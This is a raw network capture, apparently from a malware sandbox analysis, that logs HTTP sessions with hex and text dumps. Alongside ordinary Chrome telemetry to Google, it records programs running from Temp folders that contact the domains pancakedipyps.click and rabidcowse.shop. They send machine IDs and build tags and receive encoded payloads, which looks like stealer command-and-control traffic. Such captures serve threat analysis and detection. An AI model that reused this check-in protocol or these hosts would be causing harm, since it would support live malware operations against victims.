                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: 00 00 00 00 83 bd 88 00 00 00 00 74 22 68 d7 e8 9e 00 55 e8 b6 12 04 00 83 c4 08 bb 02 00 00 00 e9 2d 01 00 00 bb 2b 00 00 00 e9 23 01 00 00 8b b5 8c 00 00 00 85 f6 75 18 6a 07 6a 03 6a 01 e8 9a b7 00 00 83 c4 0c 89 c6 85 c0 0f 84 e2 00 00 00 bb 5d 00 00 00 f6 86 80 01 00 00 04 0f 85 ef 00 00 00 ff b5 e0 06 00 00 6a 06 56 e8 ed ed 00 00 83 c4 0c c7 85 8c 00 00 00 00 00 00 00 55 56 e8 19 b9 00 00 83 c4 08 85 c0 74 20 89 c7 56 e8 aa ba 00 00 83 c4 04 83 ff 03 b8 1b 00 00 00 bb 02 00 00 00 0f 44 d8 e9 a6 00 00 00 89 b5 8c 00 00 00 31 db 66 2e 0f 1f 84 00 00 00 00 00 c7 04 24 00 00 00 00 83 ec 14 0f 28 05 c0 e8 9e 00 0f 11 44 24 04 89 34 24 e8 62 cd 00 00 83 c4 14 85 c0 75 57 89 e0 50 56 e8 52 ce 00 00 83 c4 08 89 c7 8b 04 24 09 f8 74 06 31 c9 eb 1a 66 90 8d
                                                                                                                                                                                                                                                  Data Ascii: t"hU-+#ujjj]jVUVt VD1f.$(D$4$buWPVR$t1f


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.449905172.217.18.144432024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Content-Length: 933
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC933OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 38 39 34 32 31 38 34 38 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                  Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1735894218487",null,null,null,
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC942INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                  Set-Cookie: NID=520=quGUaRd0exzBmhWW8YTgIgrIWKqRtcOXbVJqiqC_Ef972pTBvFU3SyoalAZ73UNyZJv2h0UYI9ZC43vHoM7E6tlDkQiWwJi7b0k0z8ctBleCEgdIUkHYeTc_gvA5IXNVQkqBBvO0CBHmlNVVWDYm7Z8mBU3v-V9wW3iSeQubNgq8PmGN9QBPzRWz; expires=Sat, 05-Jul-2025 08:50:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:20 GMT
                                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Expires: Fri, 03 Jan 2025 08:50:20 GMT
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.449910188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=IVTU7BZCJ55
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 1231
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1231OUTData Raw: 2d 2d 49 56 54 55 37 42 5a 43 4a 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 56 54 55 37 42 5a 43 4a 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 56 54 55 37 42 5a 43 4a 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 64 65 63 0d 0a 2d 2d 49 56 54 55 37 42 5a 43 4a 35 35 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                                  Data Ascii: --IVTU7BZCJ55Content-Disposition: form-data; name="hwid"F9C89AE3A748EEF1AC8923850305D13E--IVTU7BZCJ55Content-Disposition: form-data; name="pid"1--IVTU7BZCJ55Content-Disposition: form-data; name="lid"FATE99--dec--IVTU7BZCJ55Conten
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:21 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=kd8sch1pl6v98fh3an9kdvd2el; expires=Tue, 29 Apr 2025 02:37:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5P7L%2FQMrBvfuWjic5Xb9UsX5CtVceN8VG3%2FQZozATHRBwZL9xd133gZ1M4LlpnHXGJu2TlExfieixabKof7Q799qo1TcMmbJ0BNygH4HDw6aegceXxJFC8hNNc7fCCNgNnF3H4VA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bda249f40caa-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3871&min_rtt=1646&rtt_var=2108&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2849&recv_bytes=2144&delivery_rate=1773997&cwnd=239&unsent_bytes=0&cid=e5e075693694f8aa&ts=464&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.449913172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 26 6a 3d
                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=7DVx4I--installs&j=
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:21 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=d1q4i3mk09gnm80ebbukd6oict; expires=Tue, 29 Apr 2025 02:37:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jLkyZHkckjykJGdtW1aE2fA5QZbClPmm4QPp1nnSmDHq8NjqqbtNPJAVHTK9zp9rn8Ym%2FDdPpo96VzY%2BfvFM6ZPFVY8tJA%2FAVMmiVfXgVXyYRbTg6G8QD%2FFrJVQHPR6dOlc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bda44a210ca2-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1475&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=949&delivery_rate=1933774&cwnd=32&unsent_bytes=0&cid=c982b0a1b44fb180&ts=499&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC245INData Raw: 31 34 38 63 0d 0a 45 79 7a 56 41 51 4e 66 78 68 79 49 42 67 5a 39 44 4b 6c 63 41 38 43 79 4d 4e 75 4a 64 35 2f 54 43 31 73 30 6d 72 62 35 4a 6f 4e 6f 44 71 4d 6a 4f 57 76 71 50 76 74 6a 4a 45 64 34 32 79 6c 6d 37 4a 42 52 76 36 74 4e 2b 62 4a 6e 4b 46 47 32 6c 49 39 4c 6f 53 6c 4b 74 47 31 77 4f 75 6f 2b 37 58 34 6b 52 31 66 53 66 6d 61 75 6b 41 72 35 37 42 33 39 73 6d 63 35 56 66 48 5a 69 55 72 67 65 30 43 79 61 57 59 38 6f 6e 33 6b 61 32 4d 59 61 63 67 32 62 61 6e 66 57 4c 61 72 57 37 32 32 63 58 6b 4f 75 50 75 63 55 75 4a 65 54 61 5a 71 49 53 4c 71 5a 36 70 6a 61 46 38 32 69 7a 31 6d 6f 74 35 57 76 2b 49 66 39 37 74 76 4f 46 44 77 78 70 42 41 36 33 74 4f 73 57 68 73 4e 62 5a 77 37 6d 78 6f 48 6d 50 49 66 69 2f 69 31 30 72
                                                                                                                                                                                                                                                  Data Ascii: 148cEyzVAQNfxhyIBgZ9DKlcA8CyMNuJd5/TC1s0mrb5JoNoDqMjOWvqPvtjJEd42ylm7JBRv6tN+bJnKFG2lI9LoSlKtG1wOuo+7X4kR1fSfmaukAr57B39smc5VfHZiUrge0CyaWY8on3ka2MYacg2banfWLarW722cXkOuPucUuJeTaZqISLqZ6pjaF82iz1mot5Wv+If97tvOFDwxpBA63tOsWhsNbZw7mxoHmPIfi/i10r
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 35 73 31 57 75 67 32 6f 6f 52 2b 33 5a 69 30 4b 68 62 67 43 75 49 32 59 78 35 43 61 71 62 47 67 52 61 38 67 78 5a 71 50 51 51 4c 62 72 46 76 57 35 62 54 4e 5a 39 39 75 56 54 75 5a 35 52 37 42 73 5a 6a 57 69 63 65 6b 6b 4b 6c 39 70 30 33 34 35 34 76 42 43 75 75 67 42 38 4b 41 70 4a 68 6a 68 6c 4a 78 49 6f 53 6b 4f 73 57 31 67 4d 4b 52 73 34 6d 39 76 47 6e 7a 41 4e 32 79 76 30 46 2b 7a 35 42 62 39 74 6d 4d 7a 57 66 4c 51 6c 6b 6e 6e 63 55 37 33 4c 53 45 36 76 44 36 79 4a 45 63 61 66 73 77 79 64 2b 44 71 45 71 61 6c 44 4c 32 32 5a 58 6b 4f 75 4e 79 65 52 2b 4a 36 51 62 52 72 61 69 2b 6b 62 4f 78 70 59 51 31 6f 7a 6a 42 72 6f 63 4a 59 74 2b 30 57 39 4c 70 67 50 46 48 38 6c 4e 55 45 35 6d 6b 4f 37 79 4e 41 4d 4b 39 79 34 48 4e 6b 58 33 47 46 4a 79 47 6c 33 42
                                                                                                                                                                                                                                                  Data Ascii: 5s1Wug2ooR+3Zi0KhbgCuI2Yx5CaqbGgRa8gxZqPQQLbrFvW5bTNZ99uVTuZ5R7BsZjWicekkKl9p03454vBCuugB8KApJhjhlJxIoSkOsW1gMKRs4m9vGnzAN2yv0F+z5Bb9tmMzWfLQlknncU73LSE6vD6yJEcafswyd+DqEqalDL22ZXkOuNyeR+J6QbRrai+kbOxpYQ1ozjBrocJYt+0W9LpgPFH8lNUE5mkO7yNAMK9y4HNkX3GFJyGl3B
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 38 4c 30 70 64 78 62 2f 7a 4e 73 63 6f 56 74 4e 6f 32 42 72 66 35 46 39 35 47 70 6a 43 53 37 55 63 48 6a 69 31 31 37 35 73 31 58 77 73 47 45 2f 52 50 66 5a 6d 45 72 76 66 6b 75 34 61 32 45 39 71 58 76 75 62 32 38 63 59 38 38 73 61 36 4c 59 56 37 6a 68 48 37 33 2f 4b 54 35 4f 75 49 7a 62 64 66 5a 36 44 49 4a 67 62 7a 4f 6a 61 4b 70 37 4b 67 59 75 7a 44 49 68 2b 70 42 66 73 65 34 51 38 72 42 6a 4e 31 50 79 32 4a 4e 4b 34 6d 4e 42 73 32 4e 74 4e 61 35 7a 35 47 42 73 46 6d 58 41 4f 47 47 6a 32 68 4c 33 71 78 4c 6c 38 54 46 35 59 76 2f 59 6c 6b 75 6a 52 45 32 35 62 57 59 72 35 47 47 6b 66 53 51 59 59 6f 74 6d 49 61 37 5a 55 72 4c 68 45 66 32 32 5a 44 78 56 2f 39 65 57 51 2b 74 2f 53 62 4e 76 61 44 43 69 66 75 31 67 59 51 31 72 77 6a 4a 74 34 70 34 53 76 76 4e
                                                                                                                                                                                                                                                  Data Ascii: 8L0pdxb/zNscoVtNo2Brf5F95GpjCS7UcHji1175s1XwsGE/RPfZmErvfku4a2E9qXvub28cY88sa6LYV7jhH73/KT5OuIzbdfZ6DIJgbzOjaKp7KgYuzDIh+pBfse4Q8rBjN1Py2JNK4mNBs2NtNa5z5GBsFmXAOGGj2hL3qxLl8TF5Yv/YlkujRE25bWYr5GGkfSQYYotmIa7ZUrLhEf22ZDxV/9eWQ+t/SbNvaDCifu1gYQ1rwjJt4p4SvvN
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 54 35 61 75 49 7a 62 54 65 68 6a 51 4c 6c 71 62 44 75 73 65 65 52 70 62 78 6c 6c 7a 44 6c 6e 72 39 68 66 76 4f 67 55 2b 62 74 37 4f 6c 33 79 32 5a 45 45 72 7a 46 4a 72 79 4d 35 66 59 4e 79 77 33 52 2f 44 58 69 4c 49 53 2b 37 6b 46 57 31 71 30 32 39 73 6d 59 77 57 66 44 63 6c 45 76 6c 66 30 69 78 62 6d 51 79 72 6d 7a 69 61 6d 6b 55 59 63 41 73 59 61 2f 55 58 72 33 6a 48 76 66 78 4a 33 6c 52 34 4a 54 44 42 4e 52 38 51 62 64 67 64 33 32 37 4d 50 4d 6b 59 78 4d 75 6b 33 35 74 72 4e 42 64 74 65 63 65 39 62 42 6c 4e 31 48 39 33 5a 4e 4d 38 33 42 4b 76 32 4a 76 4d 71 56 36 37 32 46 67 47 47 72 4e 4d 53 48 73 6b 46 57 68 71 30 32 39 6e 6b 34 4d 46 4e 6e 75 32 31 75 76 61 41 36 77 62 79 46 6c 35 48 4c 70 61 47 77 51 61 4d 49 79 61 36 76 62 58 72 4c 76 47 66 53 30
                                                                                                                                                                                                                                                  Data Ascii: T5auIzbTehjQLlqbDuseeRpbxllzDlnr9hfvOgU+bt7Ol3y2ZEErzFJryM5fYNyw3R/DXiLIS+7kFW1q029smYwWfDclEvlf0ixbmQyrmziamkUYcAsYa/UXr3jHvfxJ3lR4JTDBNR8Qbdgd327MPMkYxMuk35trNBdtece9bBlN1H93ZNM83BKv2JvMqV672FgGGrNMSHskFWhq029nk4MFNnu21uvaA6wbyFl5HLpaGwQaMIya6vbXrLvGfS0
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC916INData Raw: 6e 53 69 55 50 6f 59 30 43 36 62 47 6b 31 72 58 2f 75 59 57 6b 5a 59 73 45 2f 5a 71 7a 65 57 76 6d 6c 56 66 71 70 4b 57 45 57 32 63 53 41 56 76 64 38 62 37 70 73 49 53 4c 71 5a 36 70 6a 61 46 38 32 69 7a 64 7a 70 74 31 41 73 4f 77 62 38 72 4a 37 4f 46 76 7a 78 70 78 4c 35 58 5a 43 73 57 78 6e 50 4b 46 30 35 6d 4e 68 46 47 48 48 66 69 2f 69 31 30 72 35 73 31 58 54 75 6e 6f 75 56 66 62 66 6a 56 2b 68 62 67 43 75 49 32 59 78 35 43 61 71 5a 32 38 55 61 73 73 79 59 61 62 64 55 71 76 6b 45 76 71 34 59 69 74 63 2f 39 4f 51 54 4f 70 2b 53 4b 56 76 62 79 2b 68 62 50 67 6b 4b 6c 39 70 30 33 34 35 34 75 5a 56 71 66 73 57 76 34 42 2f 4f 6b 44 7a 32 5a 63 45 2f 6a 39 58 39 32 52 74 66 66 77 2b 37 47 74 74 48 47 48 4b 4e 32 32 76 31 56 75 38 36 68 50 35 75 32 4d 35 55
                                                                                                                                                                                                                                                  Data Ascii: nSiUPoY0C6bGk1rX/uYWkZYsE/ZqzeWvmlVfqpKWEW2cSAVvd8b7psISLqZ6pjaF82izdzpt1AsOwb8rJ7OFvzxpxL5XZCsWxnPKF05mNhFGHHfi/i10r5s1XTunouVfbfjV+hbgCuI2Yx5CaqZ28UassyYabdUqvkEvq4Yitc/9OQTOp+SKVvby+hbPgkKl9p03454uZVqfsWv4B/OkDz2ZcE/j9X92Rtffw+7GttHGHKN22v1Vu86hP5u2M5U
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 33 35 30 38 0d 0a 62 57 49 55 62 63 45 78 5a 71 54 55 55 72 4c 73 47 2f 75 30 59 6a 41 57 74 70 53 63 58 4b 45 70 44 70 46 41 63 79 2b 57 63 4f 6c 2f 4a 41 41 67 30 6e 35 6d 72 70 41 4b 2b 65 41 64 38 71 4e 73 4d 46 37 38 33 5a 74 41 36 33 78 4a 74 32 5a 73 4f 4b 42 77 37 6d 4e 6b 45 32 48 4d 4e 6d 36 6d 30 46 33 35 70 56 58 36 71 53 6c 68 46 74 6a 66 6a 57 58 76 65 6c 7a 33 66 43 38 6b 35 48 6e 6d 4a 44 78 66 59 4d 49 2f 61 61 7a 63 57 72 33 35 46 66 61 34 5a 6a 68 5a 2b 4e 65 61 54 75 6c 6a 53 4c 64 6f 61 54 71 73 65 75 52 32 5a 52 41 75 68 58 35 6d 75 70 41 4b 2b 64 6f 44 2b 72 5a 6d 65 33 2f 2f 7a 35 70 4f 34 6e 70 43 39 33 77 76 4a 4f 52 35 35 69 51 38 58 32 50 48 4d 32 57 77 33 46 4b 35 34 68 4c 33 6f 32 59 32 57 2f 76 55 6e 6c 62 67 59 30 47 38 5a
                                                                                                                                                                                                                                                  Data Ascii: 3508bWIUbcExZqTUUrLsG/u0YjAWtpScXKEpDpFAcy+WcOl/JAAg0n5mrpAK+eAd8qNsMF783ZtA63xJt2ZsOKBw7mNkE2HMNm6m0F35pVX6qSlhFtjfjWXvelz3fC8k5HnmJDxfYMI/aazcWr35Ffa4ZjhZ+NeaTuljSLdoaTqseuR2ZRAuhX5mupAK+doD+rZme3//z5pO4npC93wvJOR55iQ8X2PHM2Ww3FK54hL3o2Y2W/vUnlbgY0G8Z
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 31 2b 47 39 32 46 47 62 49 4d 47 6d 72 30 46 79 35 36 68 6a 39 38 53 64 35 55 65 43 55 77 77 54 45 55 6c 6d 68 61 53 4d 65 73 32 6a 67 59 32 67 4a 5a 63 6f 39 64 36 2f 41 45 76 65 72 42 50 71 67 4b 57 46 41 36 4d 4f 63 57 36 39 6f 44 72 42 76 49 57 58 6b 64 65 56 71 61 52 52 71 77 6a 74 70 6f 64 56 58 73 2b 63 5a 2f 4c 6c 67 4d 31 50 39 30 70 46 48 37 33 35 50 75 32 64 6f 4d 36 30 2b 70 43 52 6a 42 79 36 54 66 6c 65 79 31 30 71 30 2b 31 66 50 73 6e 67 6f 51 2f 58 45 6e 51 62 4f 63 6b 4b 30 5a 6d 59 74 35 47 47 6b 66 53 51 59 59 6f 74 6d 49 61 4c 55 58 72 72 73 47 2f 4b 38 5a 6a 35 64 39 39 36 56 56 75 35 30 52 72 74 72 62 43 2b 75 64 50 68 74 62 52 4a 67 77 79 78 69 34 70 34 53 76 76 4e 56 70 66 46 62 4d 31 58 30 77 70 5a 4c 6f 57 34 41 72 69 4e 6d 4d 65
                                                                                                                                                                                                                                                  Data Ascii: 1+G92FGbIMGmr0Fy56hj98Sd5UeCUwwTEUlmhaSMes2jgY2gJZco9d6/AEverBPqgKWFA6MOcW69oDrBvIWXkdeVqaRRqwjtpodVXs+cZ/LlgM1P90pFH735Pu2doM60+pCRjBy6Tfley10q0+1fPsngoQ/XEnQbOckK0ZmYt5GGkfSQYYotmIaLUXrrsG/K8Zj5d996VVu50RrtrbC+udPhtbRJgwyxi4p4SvvNVpfFbM1X0wpZLoW4AriNmMe
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 4b 54 35 6a 77 44 4a 73 72 64 73 53 39 36 73 54 76 65 6b 35 64 78 62 38 78 64 73 63 73 53 4d 56 34 6a 41 32 62 66 5a 68 70 48 30 6b 43 53 36 54 62 43 2f 69 77 68 4c 68 71 31 4c 2b 6f 33 73 2f 56 65 37 58 33 48 72 66 55 6c 6d 68 61 58 70 2f 67 6e 6e 37 62 58 49 53 66 50 55 41 54 36 2f 52 55 62 65 70 4a 4f 75 38 65 54 70 54 2f 2b 71 6c 53 75 5a 6c 53 62 6c 6c 59 58 33 71 50 75 55 6b 50 43 59 75 67 33 35 65 37 4a 42 4b 2b 62 4e 56 79 4c 4a 6e 4e 31 48 75 78 64 5a 6e 39 6d 64 45 72 43 46 48 4f 72 56 33 2f 47 6c 32 58 79 43 4c 4f 43 48 36 67 42 7a 35 37 77 53 39 36 54 6c 72 44 61 32 48 7a 42 53 7a 62 67 43 75 49 33 64 39 2f 43 79 6b 4a 48 5a 66 4e 6f 74 35 59 72 44 43 56 4c 72 39 46 72 71 50 56 78 6c 64 37 74 57 57 54 2b 31 50 63 4b 4a 67 62 7a 4f 6a 61 50 73
